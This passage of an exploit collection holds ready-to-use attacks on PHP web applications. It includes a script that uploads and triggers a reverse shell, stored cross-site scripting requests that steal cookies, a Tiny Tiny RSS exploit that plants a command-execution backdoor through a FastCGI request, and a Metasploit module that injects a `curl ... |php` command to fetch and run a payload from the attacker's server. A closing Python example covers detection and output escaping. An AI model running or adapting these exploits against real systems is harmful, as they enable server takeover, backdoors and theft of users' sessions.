    r1 = requests.post('http://{}/cts_qr/classes/SystemSettings.php?f=update_settings'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
    if r1.text == '1':
        print("(+) File upload seems to have been successful!")
        return None
    else:
        print("(-) Oh no, the file upload seems to have failed!")
        exit()

def trigger_shell(target_ip):
    print("(+) Now trying to trigger our shell..")
    # The file we uploaded previously is expected to be an image that the web app tries to embed into the login page.
    # So by requesting the login page, our reverse shell php file will get triggered automatically.
    # We don't even need to calculate the random bits of its new name.
    r2 = requests.get('http://{}/cts_qr/login.php'.format(target_ip))
    return None

def main():
    if len(sys.argv) != 4:
        print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
        print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
        sys.exit(-1)
    target_ip = sys.argv[1]
    attacker_ip = sys.argv[2]
    attacker_port = sys.argv[3]
    file_upload(target_ip, attacker_ip, attacker_port)
    trigger_shell(target_ip)
    print("\n(+) done!")

if __name__ == "__main__":
    main()
  21. # Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: Praharsh Kumar Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Persistent/Stored XSS
# Tested on: Parrot OS

# A stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe:
# the options parameter used when adding questions is affected by this vulnerability.

# payload: </script><script >alert(document.cookie)</script>

POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c

POC:
# go to url http://localhost:8080/admin.php
# login and add a question
# then put the above payload in the MCQ options parameter
# then fill in the remaining details
# then click add
# go to url http://localhost:8080/login.php
# then login to a user account
# then attempt the quiz; while attempting the quiz the XSS pops up there..!
  22. # Exploit Title: Tiny Tiny RSS - Remote Code Execution
# Date: 21/09/2020
# Exploit Author: Daniel Neagaru & Benjamin Nadarević
# Blog post: https://www.digeex.de/blog/tinytinyrss/
# Software Link: https://git.tt-rss.org/fox/tt-rss
# Version: all before 2020-09-16
# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
# Tested on: default docker installation method
# CVE : CVE-2020-25787

#!/usr/bin/env python3
from sys import argv
import urllib.parse as ul
import base64


def CustomFcgi(filename, output, backdoor):
    # Builds a FastCGI request (BEGIN_REQUEST, PARAMS, STDIN records) and wraps it in a gopher:// URL
    length = len(output) + len(backdoor) + 64
    char = chr(length)
    data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))
    data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
    data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) + "SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"
    temp1 = chr(len(data) // 256)
    temp2 = chr(len(data) % 256)
    temp3 = chr(len(data) % 8)
    end = str("\x00" * (len(data) % 8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"
    end += "<?php file_put_contents('" + output + "',base64_decode(" + "'" + str(backdoor.decode('ascii')) + "')" + ");die('executed');?>\x00\x00\x00\x00"
    start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"
    payload = start + data + end

    def get_payload(payload):
        finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+", "%20").replace("%2F", "/")
        return finalpayload

    # Double URL-encoded: once for the gopher URL, once for the imgproxy 'url' parameter
    return "gopher://localhost:9000/_" + get_payload(get_payload(payload))


TTRSS_PATH = "/var/www/html/tt-rss/"
BACKDOOR_CODE = """
<?php
echo "success\n";
echo system($_GET['cmd']);
?>
"""

feed_file = open("malicious_RCE_feed.xml", 'w')
filename = TTRSS_PATH + "config.php"
output = TTRSS_PATH + "backdoor.php"
backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"
feed = """<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Exploit demo - rce</title>
<link></link>
<description>You are getting infected :(</description>
<item>
<title> Check if there is backdoor.php</title>
<link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link>
<description>
<![CDATA[
Dummy text <img src="{}">
]]>
</description>
</item>
</channel>
</rss>
""".format(rce)
feed_file.write(feed)
feed_file.close()
  23. # Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: P.Naveen Kumar
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software : Web Based Quiz System
# Version : 1.0
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Persistent/Stored XSS
# Tested on: Windows 10 Pro

# A stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe:
# the name parameter of the registration form is affected by this vulnerability.

# payload: <script>alert(document.cookie)</script>

# HTTP POST request

POST http://localhost:8080/quiz/register.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
Content-Length: 690
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/quiz/register.php
Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
Upgrade-Insecure-Requests: 1

-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="name"

<script>alert(document.cookie)</script>
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="password"

Hacker
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="college"

hello
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="submit"

-----------------------------283640616528311462411171270636--

POC:
# go to url http://localhost:8080/quiz/register.php
# then fill in the above payload in the name/username parameter
# then fill in the remaining details
# then click submit
# then login to the user account
# then attempt any one quiz; after attempting, go to the ranking section,
# where you can see the XSS pop up there..!
  24. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit writes the payload into the database and triggers it through a
# command injection bug in the zencart v1.5.7b web application
#
###

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'zencart authenticated remote code execution exploit',
        'Description' => %q(
          This exploit module executes an OS command in zencart.
        ),
        'License' => MSF_LICENSE,
        'Author' => ['Mucahit Saratar <[email protected]>'], # msf module & research & poc
        'References' => [
          [ 'OSVDB', '' ],
          [ 'EDB', '' ],
          [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
          [ 'CVE', '2021-3291']
        ],
        'Platform' => 'php',
        'Privileged' => false,
        'Arch' => ARCH_PHP,
        'Targets' => [
          ['Automatic', {}]
        ],
        'DisclosureDate' => '2021-01-22',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ true, 'Password to login with', '']),
        OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
        OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
        OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
        OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
      ],
      self.class
    )
  end

  def start_server
    # The stager is served over plain HTTP even when SSL is set for the target
    ssltut = false
    if datastore["SSL"]
      ssltut = true
      datastore["SSL"] = false
    end
    start_service({
      'Uri' => {
        'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) },
        'Path' => resource_uri
      }
    })
    print_status("payload is on #{get_uri}")
    @adresim = get_uri
    datastore['SSL'] = true if ssltut
  end

  def on_request_uri(cli, request)
    print_good('First stage is executed ! Sending 2nd stage of the payload')
    send_response(cli, payload.encoded, {'Content-Type' => 'text/html'})
  end

  def tabanyol
    datastore["BASEPATH"]
  end

  def isim
    datastore["USERNAME"]
  end

  def parola
    datastore["PASSWORD"]
  end

  def login
    #"index.php?cmd=login&camefrom=index.php"
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
      'vars_get' => {
        'cmd' => 'login',
        'camefrom' => 'index.php'
      })
    # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
    unless res
      fail_with(Failure::Unreachable, "Access web application failure")
    end
    if res.code != 200
      fail_with(Failure::Unreachable, "we did not get a 200 response")
    end
    if !res.get_cookies.empty?
      @cookie = res.get_cookies
      @csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
      if @csrftoken.empty?
        fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
      end
      vprint_good("login Csrf token: " + @csrftoken)
    end
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
      'cookie' => @cookie,
      'vars_post' => {
        'securityToken' => @csrftoken,
        'action' => "do" + @csrftoken,
        'admin_name' => isim,
        'admin_pass' => parola
      })
    if res.code != 302
      # A successful login redirects; anything else means the credentials were rejected
      fail_with(Failure::UnexpectedReply, 'Login did not redirect, wrong credentials?')
    end
    true
  end

  def check
    unless login
      return CheckCode::NotVulnerable('Wrong credentials')
    end
    print_good("We logged in")
    CheckCode::Vulnerable('Authenticated successfully')
  end

  def exploit
    check
    start_server
    sleep(4)
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
      'vars_get' => {
        'cmd' => 'modules',
        'set' => datastore["MODULE"],
        'module' => datastore["SETTING"],
        'action' => 'edit'
      },
      'cookie' => @cookie
    )
    if res.code != 200
      fail_with(Failure::UnexpectedReply, 'Something wrong, code must be 200')
    end
    # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
    if res && res.code == 200
      @formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
      if @formtoken.empty?
        fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
      end
      #print_good(@formtoken)
      # <form name="modules"
      @radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/)
      @selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/)
      @textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/)
      @secme = {}
      @secme["securityToken"] = @formtoken
      for @a in @radiolar
        @secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //"
      end
      for @a in @selectler
        @secme["configuration[#{@a[0]}]"] = "0"
      end
      for @a in @textarr
        @secme["configuration[#{@a[0]}]"] = "0"
      end
      print_good(@secme.to_s)
      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
        'cookie' => @cookie,
        'vars_get' => {
          'cmd' => 'modules',
          'set' => datastore["MODULE"],
          'module' => datastore["SETTING"],
          'action' => 'save'
        },
        'vars_post' => @secme
      )
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
        'vars_get' => {
          'cmd' => 'modules',
          'set' => datastore["MODULE"],
          'module' => datastore["SETTING"],
          'action' => 'edit'
        },
        'cookie' => @cookie
      )
    end
  end
end
  25. # Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)
      # Date: 2021-03-03
      # Exploit Author: Tushar Vaidya
      # Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
      # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
      # Version: v1.0
      # Tested on: Ubuntu

      Steps to Reproduce:

      1) Login with Admin Credentials and click on the Person List button.
      2) Click on the Add Person button.
      3) Now add 'Ba1man' in the input field of Name and 'Ba2man' in the input field of Address, then intercept it with Burp Suite.
      4) Now add the following payloads in the input fields of Name & Address.
         Payload 1: ba1man"></td><script>alert(document.cookie)</script>
         Payload 2: ba2man"></td><script>alert(document.URL)</script>
      5) Click on Add.
      6) Now go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
      7) XSS payload is triggered.
      8) Secondly, go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
      9) Again XSS payload is triggered.

      Proof-of-concept:

      1) Vulnerable Form Request:

      POST /LSSMES/lssems/admin/add-person.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: multipart/form-data; boundary=---------------------------366892106534365372313887502624
      Content-Length: 1110
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/LSSMES/lssems/admin/add-person.php
      Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
      Upgrade-Insecure-Requests: 1

      -----------------------------366892106534365372313887502624
      Content-Disposition: form-data; name="category"

      3
      -----------------------------366892106534365372313887502624
      Content-Disposition: form-data; name="name"

      ba1man"></td><script>alert(document.cookie)</script>
      -----------------------------366892106534365372313887502624
      Content-Disposition: form-data; name="propic"; filename="mime_shell.php.gif"
      Content-Type: image/gif

      GIF8;
      -----------------------------366892106534365372313887502624
      Content-Disposition: form-data; name="mobilenumber"

      8524697125
      -----------------------------366892106534365372313887502624
      Content-Disposition: form-data; name="address"

      ba1man"></td><script>alert(document.URL)</script>
      -----------------------------366892106534365372313887502624
      Content-Disposition: form-data; name="city"

      -----------------------------366892106534365372313887502624
      Content-Disposition: form-data; name="submit"

      -----------------------------366892106534365372313887502624--

      2.1) Response: Go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
      Note: XSS from name parameter

      2.2) Response: Go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
      Note: XSS from address parameter
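The two payloads in this advisory work because the stored name and address values are written back into an HTML attribute and table cell without output encoding, so the leading `"></td>` closes the attribute and the cell before the `<script>` tag. The following Python is an added example, not part of the advisory and not code from LSSMES: it parses the multipart body from the proof-of-concept request above (reconstructed inline as a constructed sample), flags the form fields that carry markup, and shows the same values rendered with context-aware escaping so they display as text. The person-row template is a hypothetical stand-in for the application's own page, whose source is not shown here.

```python
import html
import re

# Multipart body reconstructed from the advisory's proof-of-concept request
# (constructed sample: same boundary, field names and payload values as in
# the request above; the uploaded file body is just its first bytes).
BOUNDARY = b"---------------------------366892106534365372313887502624"
POC_BODY = (
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="category"\r\n\r\n3\r\n'
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="name"\r\n\r\n'
    b'ba1man"></td><script>alert(document.cookie)</script>\r\n'
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="propic"; filename="mime_shell.php.gif"\r\n'
    b"Content-Type: image/gif\r\n\r\nGIF8;\r\n"
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="mobilenumber"\r\n\r\n8524697125\r\n'
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="address"\r\n\r\n'
    b'ba1man"></td><script>alert(document.URL)</script>\r\n'
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="city"\r\n\r\n\r\n'
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="submit"\r\n\r\n\r\n'
    b"--" + BOUNDARY + b"--\r\n"
)

# Coarse markup detector for text fields: a tag opener, a javascript: URL,
# or an inline event handler attribute.
MARKUP = re.compile(r'<\s*/?\s*[a-z!]|javascript:|\bon[a-z]+\s*=', re.IGNORECASE)


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Minimal multipart/form-data parser returning {field name: value}.
    File parts are reduced to "<file:NAME>" so the markup check can skip them."""
    fields = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, value = chunk.partition(b"\r\n\r\n")
        if value.endswith(b"\r\n"):          # that CRLF belongs to the next delimiter
            value = value[:-2]
        headers = head.decode("latin-1")
        name = re.search(r';\s*name="([^"]*)"', headers)
        if not name:
            continue
        filename = re.search(r'filename="([^"]*)"', headers)
        fields[name.group(1)] = ("<file:%s>" % filename.group(1)) if filename \
            else value.decode("utf-8", "replace")
    return fields


def flag_markup(fields: dict) -> list:
    """Names of the text fields whose value carries HTML markup."""
    return [n for n, v in fields.items()
            if not v.startswith("<file:") and MARKUP.search(v)]


def render_person_row_unsafe(name: str, address: str) -> str:
    """Hypothetical rendering that mirrors the advisory's symptom: values are
    interpolated raw, so a leading '">' closes the attribute and the cell."""
    return ('<tr><td><input type="text" name="name" value="%s"></td>'
            '<td>%s</td></tr>' % (name, address))


def render_person_row(name: str, address: str) -> str:
    """Same row with output encoding chosen per context: quote=True for the
    attribute value, plain html.escape for the text node."""
    return ('<tr><td><input type="text" name="name" value="%s"></td>'
            '<td>%s</td></tr>' % (html.escape(name, quote=True), html.escape(address)))


def contains_live_script(rendered: str) -> bool:
    """True if the rendered HTML still contains an unescaped <script> tag."""
    return re.search(r'<script\b', rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    fields = parse_multipart(POC_BODY, BOUNDARY)
    print("fields carrying markup:", flag_markup(fields))
    for label, fn in (("unsafe", render_person_row_unsafe), ("escaped", render_person_row)):
        out = fn(fields["name"], fields["address"])
        print("%s rendering: live script tag = %s" % (label, contains_live_script(out)))
```

Escaping at output time is the fix that removes the bug; the field check is only a detection aid, since a legitimate address can contain characters the coarse regex flags, and encoding on output covers values that reached the database by other paths.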
